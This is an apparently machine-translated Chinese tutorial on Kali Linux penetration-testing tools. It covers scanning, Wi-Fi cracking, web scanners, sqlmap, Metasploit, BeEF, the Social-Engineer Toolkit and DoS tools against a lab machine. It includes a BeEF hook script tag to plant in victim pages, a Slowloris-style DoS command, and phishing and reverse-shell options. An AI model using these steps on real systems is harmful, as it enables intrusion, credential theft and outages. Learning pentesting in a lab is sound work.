Kali Linux - 快速指南


Kali Linux - 安装和配置

Kali Linux 是道德黑客最好的安全包之一,包含一组按类别划分的工具。它是一个开源的,其官方网页是https://www.kali.org。

一般来说,Kali Linux 可以作为操作系统安装在机器上,作为虚拟机,我们将在下一节中讨论。安装 Kali Linux 是一个实用的选择,因为它提供了更多工作和组合工具的选项。您还可以创建实时启动 CD 或 USB。所有这些都可以在以下链接中找到:https://www.kali.org/downloads/

BackTrack是 Kali Linux 发行版的旧版本。最新版本是 Kali 2016.1,并且更新非常频繁。

Linux发行版

安装 Kali Linux -

  • 首先,我们将下载 Virtual box 并安装它。
  • 稍后,我们将下载并安装 Kali Linux 发行版。

下载并安装 Virtual Box

当您想在 Kali Linux 上测试您不确定的东西时,Virtual Box 特别有用。当您想尝试未知的软件包或测试代码时,在 Virtual Box 上运行 Kali Linux 是安全的。

在 Virtual Box 的帮助下,您可以在系统上安装 Kali Linux(不是直接安装在硬盘中)以及主要操作系统(可以是 MAC、Windows 或其他版本的 Linux)。

让我们了解如何在系统上下载并安装 Virtual Box。

步骤 1 - 要下载,请访问https://www.virtualbox.org/wiki/Downloads。根据您的操作系统,选择正确的软件包。在这种情况下,它将是 Windows 的第一个,如以下屏幕截图所示。

虚拟盒首页

步骤 2 - 单击“下一步”

设置

步骤 3 - 下一页将为您提供选择要安装应用程序的位置的选项。在这种情况下,让我们将其保留为默认值,然后单击“下一步”

自定义设置

步骤 4 - 单击“下一步” ,将弹出以下自定义设置屏幕截图。选择您想要安装的功能,然后单击“下一步”。

定制功能

步骤 5 - 单击“是”继续安装。

网络接口

步骤 6 -弹出“准备安装”屏幕。单击安装。

准备安装

步骤 7 - 单击“完成”按钮。

完成安装

Virtual Box 应用程序现在将打开,如以下屏幕截图所示。现在我们已准备好安装本手册的其余主机,这也建议用于专业用途。

虚拟管理器

安装 Kali Linux

现在我们已经成功安装了 Virtual Box,让我们继续下一步并安装 Kali Linux。

步骤 1 - 从其官方网站下载 Kali Linux 软件包:https://www.kali.org/downloads/

进攻性安全

步骤 2 - 单击VirtualBox → 新建,如以下屏幕截图所示。

机器新

步骤 3 - 选择正确的虚拟硬盘文件,然后单击“打开”

硬盘文件

步骤 4 - 弹出以下屏幕截图。单击创建按钮。

创造

步骤 5 - 启动 Kali 操作系统。默认用户名是root,密码是toor

卡利操作系统

更新卡利

不断将 Kali Linux 及其工具更新到新版本以保持功能非常重要。以下是更新 Kali 的步骤。

步骤 1 - 转到应用程序 → 终端。然后,输入“apt-get update”,更新将会发生,如下图所示。

应用

终端

步骤 2 - 现在要升级工具,请输入“apt-get update”,然后将下载新软件包。

升级

步骤 3 - 它将询问您是否要继续。输入“Y”“Enter”

输入 Y

步骤 4 - 要升级到较新版本的操作系统,请键入“apt-get distupgrade”

远程升级

实验室设置

本节我们将搭建另一台测试机,借助Kali Linux的工具进行测试。

步骤 1 - 下载Metasploitable,这是一台 Linux 机器。可以从Rapid7官方网页下载:https://information.rapid7.com/metasploitabledownload.html ?LS=1631875&CS=web

元分析

第 2 步- 提供您的详细信息进行注册。填写完上面的表格后,我们就可以下载软件了。

注册

步骤 3 - 单击VirtualBox → 新建

机器新

步骤 4 - 单击“使用现有虚拟硬盘文件”浏览您下载Metasploitable 的文件并单击Open

现有硬盘

步骤 5 - 弹出创建虚拟机的屏幕。单击“创建”。

机器弹出窗口

默认用户名是msfadmin,密码是msfadmin

登录详细信息

Kali Linux - 信息收集工具

本章我们将讨论Kali Linux的信息收集工具。

NMAP 和 ZenMAP

NMAP 和 ZenMAP 是 Kali Linux 中道德黑客扫描阶段的有用工具。NMAP 和 ZenMAP 实际上是相同的工具,但是 NMAP 使用命令行,而 ZenMAP 有 GUI。

NMAP 是一个用于网络发现和安全审核的免费实用工具。许多系统和网络管理员还发现它对于网络清单、管理服务升级计划以及监控主机或服务正常运行时间等任务很有用。

NMAP 以新颖的方式使用原始 IP 数据包来确定网络上哪些主机可用、这些主机提供哪些服务(应用程序名称和版本)、它们正在运行哪些操作系统(和操作系统版本)、数据包过滤器/防火墙的类型正在使用等

现在,让我们一步步学习如何使用NMAP和ZenMAP。

步骤 1 - 要打开,请转到应用程序 → 01-信息收集 → nmap 或 zenmap。

Nmap ZenMap

步骤 2 - 下一步是检测目标主机的操作系统类型/版本。根据NMAP指示的帮助,操作系统类型/版本检测的参数是变量“-O”。欲了解更多信息,请使用此链接:https ://nmap.org/book/man-os-detection.html

我们将使用的命令是 -

nmap -O 192.168.1.101

以下屏幕截图显示了您需要在何处键入上述命令才能查看 Nmap 输出 -

Nmap 输出

步骤 3 - 接下来,打开 TCP 和 UDP 端口。要基于 NMAP 扫描所有 TCP 端口,请使用以下命令 -

nmap -p 1-65535 -T4  192.168.1.101 

其中参数“-p”表示所有需要扫描的TCP端口。在这种情况下,我们正在扫描所有端口,“-T4”是 NMAP 运行时的扫描速度。

以下是结果。绿色是所有 TCP 开放端口,红色是所有关闭端口。但是,由于列表太长,NMAP 并未显示。

关闭的端口

隐形扫描

隐形扫描或 SYN 也称为半开放扫描,因为它不完成 TCP 三向握手。黑客向目标发送SYN数据包;如果收到回 SYN/ACK 帧,则假定目标将完成连接并且端口正在侦听。如果从目标收到 RST,则假定该端口不活动或已关闭。

半开扫描

同步包

现在要实际查看 SYN 扫描,请使用 NMAP 中的参数–sS。以下是完整命令 -

nmap -sS -T4 192.168.1.101 

以下屏幕截图显示了如何使用此命令 -

ZenMap 命令

搜索漏洞

Searchsploit是一个帮助Kali Linux用户直接从Exploit数据库存档中使用命令行进行搜索的工具。

要打开它,请转到“应用程序”→“08-漏洞利用工具”→“searchsploit”,如下图所示。

搜索漏洞

打开终端后,输入“ searchsploit利用索引名称”。

利用索引名称

域名解析工具

在本节中,我们将学习如何使用 Kali 集成的一些 DNS 工具。基本上,这些工具有助于区域传输或域 IP 解决问题。

dnsenum.pl

第一个工具是dnsenum.pl,它是一个 PERL 脚本,有助于将 MX、A 和其他记录连接到域。

单击左侧面板上的终端。

终端左面板

输入“dnsenum域名”,将显示所有记录。在本例中,它显示 A 记录。

域名

DNS映射

第二个工具是DNSMAP,它有助于查找我们正在搜索的电话号码、联系人以及连接到该域的其他子域。下面是一个例子。

点击上图所示的终端,然后输入“dnsmap域名”

DNS 映射

域名追踪器

第三个工具是dnstracer,它确定给定域名服务器 (DNS) 从哪里获取给定主机名的信息。

单击上半部分的终端,然后输入“dnstracer 域名”

域名追踪器

小黑裙工具

LBD(负载平衡检测器)工具非常有趣,因为它们检测给定域是否使用 DNS 和/或 HTTP 负载平衡。这很重要,因为如果您有两台服务器,其中一台可能不会更新,您可以尝试利用它。以下是使用它的步骤 -

首先,单击左侧面板上的终端。

终端左面板

然后,输入“lbd 域名”。如果它产生的结果为“FOUND”,则意味着服务器具有负载平衡。在这种情况下,结果是“NOT FOUND”。

LBD域名

和平3

Hping3 被道德黑客广泛使用。它与 ping 工具几乎相似,但更先进,因为它可以绕过防火墙过滤器并使用 TCP、UDP、ICMP 和 RAW-IP 协议。它具有跟踪路由模式以及在覆盖通道之间发送文件的能力。

单击左侧面板上的终端。

终端左面板

输入“hping3 –h”,这将显示如何使用此命令。

和平3

另一个命令是“hping3 域或 IP 参数”

IP参数

Kali Linux - 漏洞分析工具

在本章中,我们将学习如何使用一些工具来帮助我们利用设备或应用程序来获取访问权限。

思科工具

Kali 有一些可用于攻击 Cisco 路由器的工具。Cisco-torch就是这样的工具之一,用于大规模扫描、指纹识别和利用。

让我们通过单击左侧窗格来打开终端控制台。

终端左面板

然后,输入“cisco-torch –parameter IP of host”,如果没有发现任何可利用的内容,则会显示以下结果。

思科火炬

要查看可以使用哪些参数,请输入“cisco-torch ?”

思科参数

思科审计工具

它是一个 PERL 脚本,可扫描 Cisco 路由器的常见漏洞。要使用它,请再次打开左窗格中的终端(如上一节所示)并输入“CAT –h 主机名或 IP”

您可以添加端口参数“-p”,如下图所示,在本例中为 23 来暴力破解。

端口参数

思科全球剥削者

Cisco Global Exploiter (CGE) 是一种先进、简单且快速的安全测试工具。使用这些工具,您可以执行多种类型的攻击,如以下屏幕截图所示。但是,在实时环境中进行测试时要小心,因为其中一些可能会使思科设备崩溃。例如,选项选项可以停止服务。

思科设备

要使用此工具,请输入“cge.pl漏洞的IP 地址编号”

以下屏幕截图显示了在 Cisco 路由器上针对上面列表中的第 3 号漏洞执行的测试结果。结果表明该漏洞已被成功利用。

思科路由器

BED 是一个程序,旨在检查守护进程是否存在潜在的缓冲区溢出、格式字符串等。等人。

检查守护进程

本例中,我们将使用IP 192.168.1.102和协议HTTP来测试测试机。

命令将为“bed –s HTTP –t 192.168.1.102”,测试将继续。

测试

Kali Linux - 无线攻击

在本章中,我们将学习如何使用Kali Linux自带的Wi-Fi破解工具。但是,重要的是您拥有的无线卡支持监控模式。

蕨类 Wifi 破解器

Fern Wifi破解器是Kali拥有的破解无线的工具之一。

在打开Fern之前,我们应该将无线网卡设置为监听模式。为此,请在终端中输入“airmon-ng start wlan-0” 。

吴艾蒙

现在,打开 Fern 无线破解器。

步骤1 - 应用程序→单击“无线攻击”→“Fern Wireless Cracker”。

Fern 无线破解器

步骤 2 - 选择无线卡,如以下屏幕截图所示。

无线网卡

步骤 3 - 单击“扫描接入点”。

切入点

步骤 4 - 完成扫描后,它将显示找到的所有无线网络。在这种情况下,仅找到“WPA 网络”。

WPA网络

步骤 5 - 单击 WPA 网络,如上面的屏幕截图所示。它显示了找到的所有无线网络。一般来说,在 WPA 网络中,它会执行字典攻击。

步骤 6 - 单击“浏览”并找到用于攻击的单词列表。

单词表

步骤 7 - 单击“Wifi 攻击”。

无线网络攻击

步骤8 - 完成字典攻击后,它找到了密码,它将显示如下屏幕截图所示。

字典攻击

天运

Kismet是一款WIFI网络分析工具。它是一个 802.11 第 2 层无线网络检测器、嗅探器和入侵检测系统。它可以与任何支持原始监控 (rfmon) 模式的无线卡配合使用,并且可以嗅探 802.11a/b/g/n 流量。它通过收集数据包和隐藏网络来识别网络。

要使用它,请将无线卡设置为监视模式,然后在终端中输入“airmon-ng start wlan-0” 。

启动无线网络

让我们学习如何使用这个工具。

步骤 1 - 要启动它,请打开终端并输入“kismet”。

发射

步骤 2 - 单击“确定”。

天运

步骤 3 - 当要求启动 Kismet 服务器时单击“是”。否则它将停止运行。

启动服务器

步骤 4 - 启动选项,保留默认值。单击“开始”。

保留默认值

步骤 5 - 现在它将显示一个表格,要求您定义无线卡。在这种情况下,请单击“是”。

定义表

步骤 6 - 在这种情况下,无线源是“wlan0”。必须将其写入“Intf”部分→单击“添加”。

无线信号源

步骤 7 - 它将开始嗅探 wifi 网络,如下面的屏幕截图所示。

网络

步骤 8 - 单击任何网络,它会生成无线详细信息,如以下屏幕截图所示。

无线网络

地理信息系统

GISKismet 是一种无线可视化工具,用于以实用的方式表示使用 Kismet 收集的数据。GISKismet 将信息存储在数据库中,以便我们可以使用 SQL 查询数据并生成图表。GISKismet 目前使用 SQLite 作为数据库,使用 GoogleEarth / KML 文件进行绘图。

让我们学习如何使用这个工具。

步骤 1 - 要打开 GISKismet,请转到:应用程序 → 单击“无线攻击”→ giskismet。

Guice基斯梅特

正如您在上一节中所记得的那样,我们使用 Kismet 工具来探索有关无线网络的数据以及 netXML 文件中的所有这些数据 Kismet 包。

步骤 2 - 要将此文件导入 Giskismet,请输入“root@kali:~# giskismet -x Kismetfilename.netxml”,它将开始导入文件。

导入文件

导入后,我们可以将它们导入到 Google Earth 中,即我们之前找到的热点。

步骤 3 - 假设我们已经安装了 Google 地球,我们单击文件 → 打开 Giskismet 创建的文件 → 单击“打开”。

谷歌地球

将显示以下地图。

地图

幽灵网络钓鱼者

Ghost Phisher 是一种流行的工具,可帮助创建虚假无线接入点,然后创建中间人攻击。

步骤 1 - 要打开它,请单击应用程序→无线攻击→“幽灵网络钓鱼”。

幽灵网络钓鱼者

步骤 2 - 打开后,我们将使用以下详细信息设置假 AP。

  • 无线接口输入:wlan0
  • SSID:无线AP名称
  • IP 地址:AP 将拥有的 IP
  • WAP:将使用此 SSID 连接的密码
打开幽灵网络钓鱼者

步骤 3 - 单击“开始”按钮。

威菲特

它是另一种无线破解工具,可连续攻击多个WEP、WPA和WPS加密网络。

首先,无线网卡必须处于监听模式。

步骤 1 - 要打开它,请转到应用程序 → 无线攻击 → Wifite。

威菲特

步骤 2 - 键入“wifite –showb”以扫描网络。

无线显示

扫描网络

步骤 3 - 要开始攻击无线网络,请单击 Ctrl + C。

进攻

步骤 4 - 输入“1”破解第一个无线网络。

先破解

步骤5 - 攻击完成后,将找到密钥。

找到钥匙

Kali Linux - 网站渗透测试

在本章中,我们将了解 Kali Linux 提供的网站渗透测试。

织女星用法

Vega 是一个免费的开源扫描仪和测试平台,用于测试 Web 应用程序的安全性。Vega 可以帮助您查找并验证 SQL 注入、跨站脚本 (XSS)、无意中泄露的敏感信息以及其他漏洞。它是用 Java 编写的,基于 GUI,可在 Linux、OS X 和 Windows 上运行。

Vega 包括一个用于快速测试的自动扫描仪和一个用于战术检查的拦截代理。Vega 可以使用网络语言 JavaScript 中强大的 API 进行扩展。官方网页是https://subgraph.com/vega/

子图

步骤 1 - 要打开 Vega,请转到应用程序 → 03-Web 应用程序分析 → Vega

织女星

步骤 2 - 如果您在路径中没有看到应用程序,请键入以下命令。

子图

步骤 3 - 要开始扫描,请单击“+”号。

织女星子图

步骤 4 - 输入要扫描的网页 URL。在这种情况下,它是metasploitable机器→单击“下一步”。

输入页面网址

步骤 5 - 选中您想要控制的模块的所有框。然后,单击“下一步”。

模块盒

步骤 6 - 在以下屏幕截图中再次单击“下一步”。

再次下一个

步骤 7 - 单击“完成”。

完成按钮

步骤 8 - 如果弹出下表,请单击“是”。

跟随重定向

扫描将继续,如以下屏幕截图所示。

扫描仪进度

步骤 9 - 扫描完成后,在左下面板上,您可以看到所有结果,根据严重程度进行分类。如果单击它,您将在右侧面板上看到漏洞的所有详细信息,例如“请求”、“讨论”、“影响”和“修复”。

左下面板

ZapProxy

ZAP-OWASP Zed Attack Proxy 是一款易于使用的集成渗透测试工具,用于查找 Web 应用程序中的漏洞。它是一个Java 接口。

步骤 1 - 要打开 ZapProxy,请转到应用程序 → 03-Web 应用程序分析 → owaspzap。

ZapProxy

步骤 2 - 单击“接受”。

授权版本

ZAP 将开始加载。

OWASP Zap

步骤 3 - 选择以下屏幕截图所示的选项之一,然后单击“开始”。

选择选项

以下网络可使用 IP 进行 Metasploit:192.168.1.101

Web Metasploitable

步骤 4 - 在“要攻击的 URL”处输入测试 Web 的 URL → 单击“攻击”。

网址攻击

扫描完成后,在左上角面板中您将看到所有已爬网的网站。

在左侧面板“警报”中,您将看到所有发现结果以及说明。

警报

步骤 5 - 单击“Spider”,您将看到扫描的所有链接。

蜘蛛

数据库工具的使用

sqlmap

sqlmap 是一个开源渗透测试工具,可以自动执行检测和利用 SQL 注入缺陷以及接管数据库服务器的过程。它配备了强大的检测引擎、最终渗透测试仪的许多利基功能以及广泛的开关,从数据库指纹识别、从数据库获取数据,到访问底层文件系统并通过输出在操作系统上执行命令。带外连接。

让我们学习如何使用sqlmap。

步骤 1 - 要打开 sqlmap,请转到应用程序 → 04-数据库评估 → sqlmap。

SQLMap

具有易受 SQL 注入攻击的参数的网页是可 Metasploitable 的。

SQL注入

步骤 2 - 要开始 sql 注入测试,请输入“sqlmap -u 受害者的 URL”

网址受害者

步骤 3 - 从结果中,您会发现某些变量容易受到攻击。

不同的结果

sql忍者

sqlninja 是 Microsoft SQL Server 上的 SQL 注入,可实现完整的 GUI 访问。sqlninja 是一个旨在利用 Microsoft SQL Server 作为后端的 Web 应用程序上的 SQL 注入漏洞的工具。有关此工具的完整信息可以在http://sqlninja.sourceforge.net/上找到

步骤 1 - 要打开 sqlninja,请转到应用程序 → 04-数据库评估 → sqlninja。

数据库评估

CMS 扫描工具

WP扫描

WPScan 是一款黑盒 WordPress 漏洞扫描程序,可用于扫描远程 WordPress 安装以查找安全问题。

步骤 1 - 要打开 WPscan,请转到应用程序 → 03-Web 应用程序分析 → “wpscan”。

Web应用程序

弹出以下屏幕截图。

扫描仪

步骤 2 - 要扫描网站是否存在漏洞,请输入“wpscan –u 网页 URL”

如果扫描仪未更新,它会要求您更新。我会建议这样做。

扫描仪更新

扫描开始后,您将看到结果。在下面的屏幕截图中,漏洞用红色箭头表示。

红色箭头

扫描开始

乔姆扫描

由于其灵活性,Joomla 可能是使用最广泛的 CMS。对于此 CMS,它是 Joomla 扫描仪。它将帮助 Web 开发人员和 Web 管理员识别其部署的 Joomla 网站上可能存在的安全漏洞。

步骤 1 - 要打开它,只需单击终端的左侧面板,然后单击“joomscan – 参数”

步骤 2 - 要获取使用类型“joomscan /?”的帮助

乔姆扫描

步骤 3 - 要开始扫描,请输入“joomscan –u 受害者的 URL”。

OWASP

结果将如下图所示显示。

漏洞

建议

SSL 扫描工具

TLSSSLed是一个 Linux shell 脚本,用于评估目标 SSL/TLS (HTTPS) Web 服务器实现的安全性。它基于 sslscan,这是一个基于 openssl 库和“openssl s_client”命令行工具的彻底 SSL/TLS 扫描器。

当前的测试包括检查目标是否支持 SSLv2 协议、NULL 密码、基于密钥长度(40 或 56 位)的弱密码、强密码(如 AES)的可用性、数字证书是否经过 MD5 签名,以及当前的 SSL/TLS 重新协商功能。

要开始测试,请打开终端并输入“tlssled URL port”。它将开始测试证书以查找数据。

蒂斯莱德

从结果中可以看出,该证书的有效期至 2018 年,如下图绿色所示。

证书

w3af

w3af 是一个 Web 应用程序攻击和审核框架,旨在识别和利用所有 Web 应用程序漏洞。该包为框架提供了图形用户界面(GUI)。如果您只需要命令行应用程序,请安装 w3af-console。

该框架被称为“Web 的 Metasploit”,但实际上它的含义远不止于此,因为它还使用黑盒扫描技术发现 Web 应用程序漏洞。w3af 核心及其插件完全用 Python 编写。该项目拥有 130 多个插件,可识别和利用 SQL 注入、跨站脚本 (XSS)、远程文件包含等。

步骤 1 - 要打开它,请转到应用程序 → 03-Web 应用程序分析 → 单击 w3af。

应用W3af

步骤 2 - 在“目标”上输入受害者的 URL,在本例中将是可metasploitable 的网址。

目标

步骤 3 - 选择配置文件 → 单击“开始”。

个人资料开始

步骤 4 - 转到“结果”,您可以看到结果的详细信息。

寻找结果

Kali Linux - 漏洞利用工具

在本章中,我们将了解 Kali Linux 提供的各种利用工具。

元分析软件

正如我们之前提到的,Metasploit 是 Rapid7 的产品,大部分资源可以在他们的网页www.metasploit.com上找到。它有两个版本 - 商业版和免费版。这两个版本之间的差异不大,因此在这种情况下我们将使用社区版本(免费)。

作为一名道德黑客,您将使用嵌入了 Metasploit 社区版本的“Kali Ditribution”,以及其他道德黑客工具,这些工具通过节省安装时间而非常舒适。但是,如果您想作为单独的工具安装,它是一个可以安装在 Linux、Windows 和 OS X 等操作系统中的应用程序。

首先,在 Kali 中打开 Metasploit 控制台。然后,转到应用程序 → 漏洞利用工具 → Metasploit。

漏洞利用工具

启动后,您将看到以下屏幕,其中 Metasploit 的版本以红色下划线显示。

Metasploit版本

在控制台中,如果您使用帮助或?符号,它将显示一个包含 MSP 命令及其描述的列表。您可以根据您的需求和用途进行选择。

控制台符号

另一个重要的管理命令是msfupdate,它有助于使用最新的漏洞利用来更新 Metasploit。在控制台中运行此命令后,您将需要等待几分钟才能完成更新。

无国界医生组织更新

它有一个很好的命令,称为“搜索”,您可以使用它来查找您想要的内容,如下面的屏幕截图所示。例如,我想查找与 Microsoft 相关的漏洞,命令可以是msf >search name:Microsoft type:exploit

其中“search”是命令,“name”是我们要查找的对象的名称,“type”是我们要查找的脚本类型。

搜索命令

另一个命令是“info”。它提供了有关使用该模块或平台的信息、作者是谁、漏洞参考以及可能具有的有效负载限制。

信息命令

阿米蒂奇

Armitage GUI for Metasploit 是 Metasploit 的补充工具。它可视化目标、推荐漏洞利用并公开高级的漏洞利用后功能。

让我们打开它,但首先应该打开并启动metasploit 控制台。要打开 Armitage,请转至应用程序 → 漏洞利用工具 → Armitage。

阿米蒂奇

单击“连接”按钮,如下图所示。

连接

当它打开时,您将看到以下屏幕。

方便使用的

Armitage 是用户友好的。“目标”区域列出了您已发现和正在使用的所有机器,被黑的目标是红色的,上面有雷雨。

破解目标后,您可以右键单击它并继续探索您需要执行的操作,例如探索(浏览)文件夹。

探索

在下面的 GUI 中,您将看到文件夹的视图,称为控制台。只需单击文件夹,您就可以在文件夹中导航,而无需使用 Metasploit 命令。

GUI 的右侧是列出漏洞模块的部分。

控制台文件夹

牛肉

BeEF 代表浏览器利用框架。它是一个专注于网络浏览器的渗透测试工具。BeEF 允许专业渗透测试人员使用客户端攻击向量评估目标环境的实际安全状况。

首先,您必须使用以下命令更新 Kali 软件包 -

root@kali:/# apt-get update  
root@kali:/# apt-get install beef-xss 

首先,使用以下命令 -

root@kali:/# cd /usr/share/beef-xss  
root@kali:/# ./beef 

卡利套餐

打开浏览器并输入用户名和密码:beef

打开浏览器

BeEF 挂钩是托管在 BeEF 服务器上的 JavaScript 文件,需要在客户端浏览器上运行。当它发生时,它会回调 BeEF 服务器,传达有关目标的大量信息。它还允许针对目标运行其他命令和模块。在此示例中, BeEF hook的位置位于http://192.168.1.101:3000/hook.js

为了攻击浏览器,请在客户端将查看的页面中包含 JavaScript 挂钩。有多种方法可以做到这一点,但最简单的是将以下内容插入页面并以某种方式让客户端打开它。

<script src = "http://192.168.1.101:3000/hook.js" type = "text/javascript"></script> 

页面加载后,返回 BeEF 控制面板并单击左上角的“在线浏览器”。几秒钟后,您应该会看到您的 IP 地址弹出窗口,代表已连接的浏览器。将鼠标悬停在 IP 上将快速提供浏览器版本、操作系统以及安装的插件等信息。

页面加载

要远程运行该命令,请单击“拥有的”主机。然后,在命令上单击要执行的模块,最后单击“执行”。

远程运行

Linux 漏洞利用建议器

考虑到Linux 操作系统的发行版本“uname -r”,它建议可能的漏洞利用。

要运行它,请输入以下命令 -

root@kali:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0

3.0.0是我们要利用的 Linux 操作系统的内核版本。

内核版本

Kali Linux - 取证工具

在本章中,我们将了解 Kali Linux 中可用的取证工具。

p0f

p0f是一种工具,即使有问题的设备位于数据包防火墙后面,也可以通过检查捕获的数据包来识别目标主机的操作系统。P0f 不会产生任何额外的直接或间接网络流量;没有名字查找;没有神秘的探测器;没有 ARIN 查询;没有什么。在高级用户手中,P0f 可以检测防火墙的存在、NAT 使用以及负载均衡器的存在。

在终端中输入“p0f – h”看看如何使用,你会得到以下结果。

目标主机

高级用户

它甚至会列出可用的接口。

可用接口

然后,键入以下命令:“p0f –i eth0 –p -o 文件名”

其中参数“-i”是接口名称,如上所示。“-p”表示处于混杂模式。“-o”表示输出将保存在文件中。

命令类型

打开地址为192.168.1.2的网页

网页地址

从结果中,您可以观察到Web服务器使用的是apache 2.x,操作系统是Debian。

pdf解析器

pdf-parser 是一个解析 PDF 文档以识别所分析的 pdf 文件中使用的基本元素的工具。它不会呈现 PDF 文档。不建议将其用于 PDF 解析器的教科书案例,但它可以完成工作。通常,这用于您怀疑其中嵌入了脚本的 pdf 文件。

命令是 -

pdf-parser  -o 10 filepath

其中“-o”是对象的数量。

数字对象

正如您在下面的屏幕截图中看到的,pdf 文件打开了一个 CMD 命令。

命令命令

杜普齐拉

Dumpzilla 应用程序是用 Python 3.x 开发的,目的是提取 Firefox、Iceweasel 和 Seamonkey 浏览器的所有取证有趣信息进行分析。

解救

它将数据从一个文件或块设备(硬盘、CDROM 等)复制到另一个文件或块设备,在发生读取错误时尝试首先抢救好的部分。

ddrescue 的基本操作是全自动的。也就是说,您不必等待错误、停止程序、从新位置重新启动程序等。

如果使用ddrescue的mapfile功能,数据会被非常有效地拯救(只读取需要的块)。此外,您可以随时中断救援并稍后在同一点恢复救援。映射文件是 ddrescue 有效性的重要组成部分。除非您知道自己在做什么,否则请使用它。

命令行是 -

dd_rescue infilepath  outfilepath

参数“-v”表示详细。“/dev/sdb”是要救援的文件夹。img 文件是恢复的图像。

恢复图像

直方图

它是另一种用于恢复文件的取证工具。它也有一个 GUI。要打开它,请在终端中输入“dff-gui” ,然后将打开以下 Web GUI。

DFF图形用户界面

单击文件→“打开证据”。

公开证据

将打开下表。选中“Raw format”,然后单击“+”选择要恢复的文件夹。

原始格式

然后,您可以浏览窗格左侧的文件以查看已恢复的内容。

浏览文件

Kali Linux - 社会工程

在本章中,我们将了解 Kali Linux 中使用的社会工程工具。

社会工程工具包的使用

Social -Engineer Toolkit (SET) 是一个专为社会工程设计的开源渗透测试框架。SET 有许多自定义攻击向量,可让您在短时间内发起可信的攻击。此类工具利用人类Behave来诱骗他们进入攻击向量。

让我们学习如何使用社会工程师工具包。

步骤 1 - 要打开 SET,请转到应用程序 → 社会工程工具 → 单击“SET”社会工程工具。

社会工程工具

步骤 2 - 它将询问您是否同意使用条款。输入“y”,如以下屏幕截图所示。

Y型

步骤 3 - 以下屏幕截图中显示的大多数菜单都是不言自明的,其中最重要的是第 1 个“社会工程攻击”。

自我解释

步骤 4 - 输入“1” → Enter。将打开一个子菜单。如果再次按Enter按钮,您将看到每个子菜单的说明。

鱼叉式网络钓鱼模块允许您专门制作电子邮件,并将其附加FileFormat 恶意负载发送给目标受害者。例如,发送恶意 PDF 文档,如果受害者打开该文档,就会危害系统。如果您想欺骗您的电子邮件地址,请确保安装了“Sendmail”(apt-get install sendmail)并将 config/set_config SENDMAIL=OFF 标志更改为 SENDMAIL=ON。

鱼叉式网络钓鱼攻击有两种选择 -

  • 执行群发电子邮件攻击
  • 创建文件格式有效负载和社会工程模板

第一个是让 SET 为您做所有事情(选项 1),第二个是创建您自己的 FileFormat 有效负载并在您自己的攻击中使用它。

第三者

输入“99”返回主菜单,然后输入“2”进入“Web 攻击向量”。

Web 攻击模块是一种利用多种基于 Web 的攻击来危害目标受害者的独特方法。如果受害者点击链接,则使用此模块对受害者执行网络钓鱼攻击。一旦他们点击链接,就可能发生各种各样的攻击。

多重攻击

输入“99”返回主菜单,然后输入“3”

具有感染性的 USB/CD/DVD 模块将创建一个 autorun.inf 文件和一个 Metasploit 负载。有效负载和自动运行文件被刻录或复制到 USB 上。当 DVD/USB/CD 插入受害者的机器时,它将触发自动运行功能(如果启用了自动运行),并有望危及系统。您可以选择您想要使用的攻击媒介:文件格式错误或直接可执行文件。

以下是传染性媒体生成器的选项。

  • 文件格式漏洞
  • 标准 Metasploit 可执行文件
传染性

输入“99”返回主菜单。然后,输入“4”进入“Web 攻击向量”。

创建有效负载和侦听器是创建 Metasploit 有效负载的简单方法。它将为您导出 exe 文件并生成一个侦听器。您需要说服受害者下载 exe 文件并执行它来获取 shell。

创建有效负载

输入“99”返回主菜单,然后输入“5”进入“Web 攻击向量”。

网络攻击向量

群发邮件攻击将允许您向受害者发送多封电子邮件并自定义消息。群发电子邮件程序有两个选项;第一种是将电子邮件发送到单个电子邮件地址。第二个选项允许您导入包含所有收件人电子邮件的列表,它会将您的邮件发送给该列表中任意数量的人。

  • 电子邮件攻击单一电子邮件地址
  • 电子邮件攻击群发邮件程序

输入“99”返回主菜单,然后输入“9”进入“Powershell Attack Vector”。

电源外壳

Powershell 攻击向量模块允许您创建 PowerShell 特定攻击。这些攻击允许您使用 PowerShell,默认情况下,所有操作系统 Windows Vista 及更高版本都提供 PowerShell。PowerShell 为部署有效负载和执行预防性技术不会触发的功能提供了卓有成效的环境。

  • Powershell 字母数字 Shellcode 注入器
  • Powershell 反向 Shell
  • Powershell 绑定 Shell
  • Powershell 转储 SAM 数据库

Kali Linux - 压力工具

压力工具用于创建 DoS 攻击或为不同的应用程序创建压力测试,以便为未来采取适当的措施。

所有压力测试工具都可以在应用程序→02-漏洞分析→压力测试中找到。

漏洞分析

所有压力测试将在 IP 为 192.168.1.102 的 metsploitable 机器上完成

压力测试

慢速http测试

Slowhttptest是DoS攻击工具之一。它特别使用HTTP协议与服务器连接并保持CPU和RAM等资源的繁忙。让我们详细看看如何使用它并解释它的功能。

要打开slowhttptest,首先打开终端并输入“slowhttptest –parameters”

您可以输入“slowhttptest –h”来查看您需要使用的所有参数。如果您收到输出“找不到命令”,您必须首先输入“apt-get install Slowhttptest”

显示 Http 测试

找不到命令

然后安装后,再次输入slowhttptest –h

慢速头球

输入以下命令 -

slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET –u 
http://192.168.1.202/index.php -x 24 -p 2

在哪里,

  • (-c 500) = 500 个连接

  • (-H) = Slowloris 模式

  • -g = 生成统计数据

  • -o 输出文件=输出文件名

  • -i 10 = 使用10秒等待数据

  • -r 200 = 200 个连接 -t GET = GET 请求

  • -u http://192.168.1.202/index.php = 目标网址

  • -x 24 = 最大长度 24 字节

  • -p 2 = 2 秒超时

时间 秒数

测试开始后,输出将如以下屏幕截图所示,您可以在其中注意到该服务可用。

测试开始

一段时间后,287 连接处的服务出现故障。这意味着服务器最多可以处理 287 个 HTTP 连接。

联系

邀请洪水

Inviteflood 是通过 UDP/IP 泛洪的 SIP/SDP INVITE 消息。它可以在各种 Linux 发行版上执行。它通过发送多个 INVITE 请求对 SIP 设备进行 DoS(拒绝服务)攻击。

要打开 Inviteflood,首先打开终端并输入“inviteflood –parameters”

如需帮助,您可以使用“inviteflood –h”

邀请洪水

接下来,您可以使用以下命令 -

inviteflood eth0 target_extension  target_domain target_ip number_of_packets

在哪里,

  • target_extension是 2000

  • 目标域是 192.168.xx

  • target_ip是 192.168.xx

  • number_of_packets为 1

  • -a是SIP帐户的别名

目标执行

雅克斯洪水

Iaxflood 是一种 VoIP DoS 工具。要打开它,请在终端中输入“iaxflood sourcename destinationname numpackets” 。

要了解如何使用,请输入“iaxflood –h”

雅克斯洪水

thc-ssl-dos

